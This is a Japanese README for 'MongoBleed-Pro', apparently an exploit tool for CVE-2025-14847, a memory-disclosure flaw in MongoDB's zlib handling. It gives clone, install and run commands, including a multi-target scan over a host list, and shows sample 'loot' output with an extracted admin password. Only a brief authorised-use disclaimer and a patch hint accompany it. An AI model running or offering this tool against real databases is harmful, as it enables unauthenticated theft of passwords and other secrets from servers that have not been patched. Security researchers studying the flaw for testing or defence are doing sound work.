
MongoDBのzlib圧縮処理における重大なメモリ情報漏洩脆弱性です。このツールにより、セキュリティ研究者は脆弱なMongoDBインスタンスから機密データを抽出できます。
高度なMongoDBメモリリーク悪用ツール
Keep Learning | Keep Hacking with CyberTechAjju
MongoBleed-Pro は CVE-2025-14847(MongoDBのzlib圧縮処理における重大なメモリ開示脆弱性)の高度な悪用ツールです。このツールにより、セキュリティ研究者は脆弱なMongoDBインスタンスから機密データを抽出できます。
このツールは許可されたセキュリティテストおよび教育目的のみを意図しています。コンピュータシステムへの不正アクセスは違法です。テスト前に必ず適切な承認を得てください。
| プロパティ | 詳細 |
|---|---|
| CVE ID | CVE-2025-14847 |
| 脆弱性タイプ | メモリ開示 |
| 影響を受けるバージョン | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| 根本原因 | zlib解凍時のバッファオーバーリード |
| 影響 | 認証不要のリモートメモリリーク |
# リポジトリをクローン
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# 依存関係をインストール
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 メモリ抽出シーケンス開始 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ ターゲット捕捉: 192.168.1.100:27017
✓ ポートOPEN
☠️ 脆弱!攻撃開始...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ 戦利品獲得: 🔐 パスワード
→ admin_pass=SuperSecret123
╔══════════════════ 抽出完了 ══════════════════╗
║ 💾 抽出バイト数: 125,847
║ 📦 ユニークフラグメント: 342
║ 🔑 発見された秘密: 5
╚══════════════════════════════════════════════════════════╝
| ファイル | 説明 |
|---|---|
loot_<host>.txt | 抽出された秘密(読み取り可能形式) |
dump_<host>.bin | 手動分析用の生メモリダンプ |
MongoDB管理者の場合は、パッチ適用済みバージョンに更新してください:
CyberTechAjju
このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。
このツールが役に立った場合は、GitHubで⭐をお願いします!
「 Keep Learning | Keep Hacking 」
Made with ❤️ by CyberTechAjju
| 引数 | 説明 | デフォルト値 |
|---|
--target | ターゲットIP/URL | 対話型プロンプト |
--file | ターゲットリストのファイル | なし |
--threads | スレッド数 | 50 |
--min-offset | 最小メモリオフセット | 20 |
--max-offset | 最大メモリオフセット | 8192 |